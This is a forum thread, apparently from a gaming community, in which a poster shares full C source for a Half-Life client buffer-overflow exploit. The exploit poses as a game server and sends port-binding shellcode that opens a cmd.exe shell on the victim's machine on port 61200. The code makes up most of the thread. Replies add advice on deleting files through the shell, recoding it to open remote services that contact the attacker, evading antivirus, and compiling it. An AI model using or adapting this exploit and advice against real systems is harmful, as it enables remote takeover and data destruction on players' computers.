


Today I have just found an exploit on the client side to access their cmd.exe shell on port 61200.

 

If anyone wants the source code, just reply Yes and I will post it in this thread.


/*

* Aaron Von Doitch

* HalfLife client <=v.1.1.1.0 remote exploit

*

* binds cmd.exe shell on port 61200

*

* Available targets:

* 1. win2k sp3 en

* 2. winxp nosp ru

* 3. winxp sp1 ru

* 4. win98 se2 (u need change shellcode)

*/

 

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <arpa/inet.h>

#include <netdb.h>

 

#define PORT 27015   /* local UDP port that main() binds; the port HalfLife clients send their queries to */

/* Canned reply that main() sends back to any datagram containing "ping":
 * the 0xFF 0xFF 0xFF 0xFF connectionless header, 'j' (0x6a), a NUL, then
 * twelve spaces. 0x12 == 18 bytes, exactly the literal's length, so there is
 * no trailing NUL in the array. */
char ping[0x12]=
"\xff\xff\xff\xff\x6a\x00\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20";

 

unsigned char evilbuf[] =

/* header of HalfLife udp-datagram | do not edit */

"\xFF\xFF\xFF\xFF\x69\x6E\x66\x6F\x73\x74\x72\x69"

"\x6E\x67\x72\x65\x73\x70\x6F\x6E\x73\x65\x00\x5c"

/* 512 bytes for bof */

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAA"

"\x5a\x5a\x5a\x5a" // EIP

"\x90\x90\x90\x90" // payload for esp

/* winxp/2k xored portbind shellcode */

/* If u want to use this xsploit against win9x/ME, change shellcode to another one */

"\x8B\xC4\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA" // decrypt

"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7"

"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0"

"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E"

"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0"

"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A"

"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96"

"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0"

"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92"

"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50"

"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97"

"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1"

"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2"

"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0"

"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2"

"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2"

"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A"

"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37"

"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F"

"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1"

"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95"

"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57"

"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A"

"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB"

"\xCD\x54\x92\x96"

/* end */

"\x5C\x00"; // end of udp-HL-datagram. Do not change!

 

/* Per-target 4-byte values, one per supported OS; main() uses the one chosen
 * by argv[1] (1..4, in the order listed here) for evilbuf[536..539]. */
char retw2ksp3[] = "\xc5\xaf\xe2\x77";
char retwxpsp0[] = "\x1c\x80\xf5\x77"; // ntdll.dll :: jmp esp
char retwxpsp1[] = "\xba\x26\xe6\x77";
char retw98se2[] = "\xa9\xbf\xda\x7f";

 

/*
 * Entry point. Runs a UDP listener on PORT, bound to INADDR_ANY (every local
 * interface), and answers whatever HalfLife client queries arrive:
 *   - a datagram containing "ping"       -> the canned `ping` reply;
 *   - a datagram containing "infostring" -> `evilbuf`, the oversized
 *                                           infostringresponse defined above;
 *   - anything else                      -> logged as "unknow request", ignored.
 * argv[1] (1..4) selects the target OS; the matching branch below touches
 * evilbuf[536..539] using the corresponding ret* table before the loop starts.
 *
 * The receive loop never breaks; the only exits are the exit() calls on
 * socket errors, so the close()/return at the bottom are not reached in
 * practice.
 *
 * Educator's note: this program is passive. It waits for a client to query
 * it, so from the client's point of view it is a hostile "game server"
 * answering normally-shaped queries; the thing being exercised is the
 * client's handling of an over-long infostringresponse, not the network path.
 */
int main(int argc, char **argv) {
    int sock, sf, len, i;                /* sf: address length in/out for recvfrom */
    u_short port=PORT;                   /* local port to bind (27015) */
    struct sockaddr_in fukin_addr, rt;   /* fukin_addr: local bind address; rt: peer address filled by recvfrom */
    char buf[0x1000];                    /* one received datagram */
    printf("\n\rHalfLife client v.1.1.1.0 remote exploit by m00 Security\n");
    if(argc!=2) {
        /* NOTE: the usage text is a single string literal spanning several
         * source lines; standard C11 does not allow that (a compiler will
         * report a missing terminating quote). Kept as the author wrote it. */
        printf("

Usage: %s <remote_os>

 

where os:

1 - win2k sp3 ru

2 - winxp nosp ru

3 - winxp sp1 ru

4 - win98 se2 ru (need another shellcode)

 

",argv[0]);
        exit(0);
    }
    /* Target selection: each branch walks evilbuf[536..539] with the ret*
     * table for that OS. The four branches are independent `if`s, so an
     * argument outside 1..4 leaves evilbuf untouched and the program
     * continues anyway. */
    if(atoi(argv[1])==1) {
        for(i=0;i<4;i++) {
            evilbuf[536+i]=retw2ksp3;
        }
    }
    if(atoi(argv[1])==2) {
        for(i=0;i<4;i++) {
            evilbuf[536+i]=retwxpsp0;
        }
    }
    if(atoi(argv[1])==3) {
        for(i=0;i<4;i++) {
            evilbuf[536+i]=retwxpsp1;
        }
    }
    if(atoi(argv[1])==4) {
        for(i=0;i<4;i++) {
            evilbuf[536+i]=retw98se2;
        }
    }

    /* Plain UDP socket; all replies go back to whichever peer address
     * recvfrom() reported, so no connection state is kept. */
    if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
        perror("[-] socket()");
        exit(0);
    }
    printf("\n[+] Socket created.\n");
    /* Bind on all interfaces (INADDR_ANY). Only the three used fields are
     * set; the rest of fukin_addr is left uninitialized. */
    fukin_addr.sin_addr.s_addr = INADDR_ANY;
    fukin_addr.sin_port = htons(port);
    fukin_addr.sin_family = AF_INET;

    if(bind(sock, (struct sockaddr *)&fukin_addr, sizeof(fukin_addr))<0) {
        perror("[-] bind()");
        exit(0);
    }
    printf("[+] Port %i binded.\n", port);
    sf = sizeof(rt);
    /* Serve queries forever; a recv/send failure is fatal (exit(1)). */
    while(1) {
        if ((len = recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&rt, &sf))<0) {
            perror("[-] recv()");
            exit(1);
        }
        printf("[+] Incoming udp datagram: ");
        /* Echo loop for the datagram. Note that the argument passed to %c is
         * buf itself rather than buf[i], and the bound is <= len. */
        for (i=0;i<=len;i++){
            printf("%c",buf);
        }
        printf("\n[~] Identyfication... ");
        /* Classify the raw datagram by substring and answer accordingly. */
        if(strstr(buf,"ping")) {
            printf("PING request\n[~] Sending answer... ");
            if(sendto(sock, ping, sizeof(ping), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
                perror("[-] send()");
                exit(1);
            } else {
                printf("OK\n");
            }
            continue;
        }
        if(strstr(buf,"infostring")) {
            printf("INFOSTRING request\n[~] Attacking... OK\n");
            printf("[+] Now try to connect to: %s:61200\n", inet_ntoa(rt.sin_addr));
            /* sizeof(evilbuf) includes the array's trailing NUL, so one byte
             * more than the literal is sent. */
            if(sendto(sock, evilbuf, sizeof(evilbuf), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
                perror("[-] send()");
                exit(1);
            }
            continue;
        }
        printf("unknow request\n");
    }
    /* Unreachable: the loop above has no break. */
    close(sock);
    return 0;
}


Today I have just found an exploit on the client side to access their cmd.exe shell on port 61200.

 

If anyone wants the source code, just reply Yes and I will post it in this thread.

 

What exactly does this enable you to do? Please explain in simple English.

cmd is command prompt

if you can access it, you have access to their whole computer.

lol means you can deltree

depends on setup snakeyes...most default XP setups, cmd.exe only sees the drive winroot is on (only sees the drive the actual OS is installed on, so if they are partitioned a:\(floppy), c:\, d:\, e:\(cd), f:\(dvd) with windows installed on D:\, all you MAY see is the D:\ drive, with the possible ability to run objects found on a:\...it may not allow you to cd c:\, or to access the cd/dvd drives.

 

but, since it's at winroot, you can still deltree and shit :)

 

 

for those unused to command line XP...default dir when cmd starts is %winroot%\documents and settings\username of user logged on....so don't forget to cd.. twice to get to root before you start hunting for stuff...

Since I don't know how to do this can someone tell me where this goes and how do I get it to work (maybe with a program?). Kthx
I will need some time because I'm in Iraq doing military work, so give me some time to find the other missing files.
I will need some time because I'm in Iraq doing military work, so give me some time to find the other missing files.

 

crazy.

I don't know what kind of military work you are doing with Counter-Strike.
I don't know what kind of military work you are doing with Counter-Strike.

 

I think I didn't clarify. That exploit was made in spare time (R&R) when I was bored... I'm sick of making weapons systems upgrades in my spare time. So I said "Hell, why not make an exploit.. lol".

 

I'm at work for 15 hours non-stop, so when I get my 9 hours of personal time I like to have fun with it. Well, I have to get to my station now, so more about finding the other files later.

hmmm..."making an exploit"...don't you mean "finding"?

 

and you aren't the first one to find this one...it was first uncovered with the adminmod psay/vsay text jump exploit, which allowed you to spawn a rogue telnet shell on whichever port you directed it to...the psay/vsay exploit uncovered the fact that the HL engine textline "drops" certain text from "printing", and instead, runs it as code or commands on the client machine.

 

Basically, this exploit can be used to open any native program, shell, or service inherent in the OS on the client machine...you just have to figure out correct char defs to cause it.

 

technically, you could recode this to open any service you wanted...you could even...say...have it open remote desktop sharing and a telnet server, and arrange a method for it to contact you (or whoever) itself anytime it's online.

 

The real advantage to this kind of exploit is the fact that since it opens native services, it'll never trigger any sort of antivirus alert.

you don't "get" an exploit, dude...you learn how to use it...it's already there.

 

he left the code for actually taking advantage of the text jump exploit to open cmd shell on his second post in the thread...copy the code, paste it to a text document, then open the document in linux or UNIX default c++ compiler, and compile

 

either that or hunt up the GNU libraries that are conveniently omitted from VS or VS.NET lists, and then compile it in visual studio or visual c++

 

it's simpler to just install a small linux partition, and compile it there, though.

woah shit. my compiler went crazy.

 

makong@censored makong $ gcc ~/rpcdcom1.c

/home/makong/rpcdcom1.c:54:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:55:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:56:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:57:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:58:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:59:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:60:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:61:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:62:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:63:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:64:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:65:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:66:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:67:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:68:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:69:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:70:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:71:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:72:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:73:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:74:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:75:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:76:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:77:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:94:8: warning: multi-line string literals are deprecated
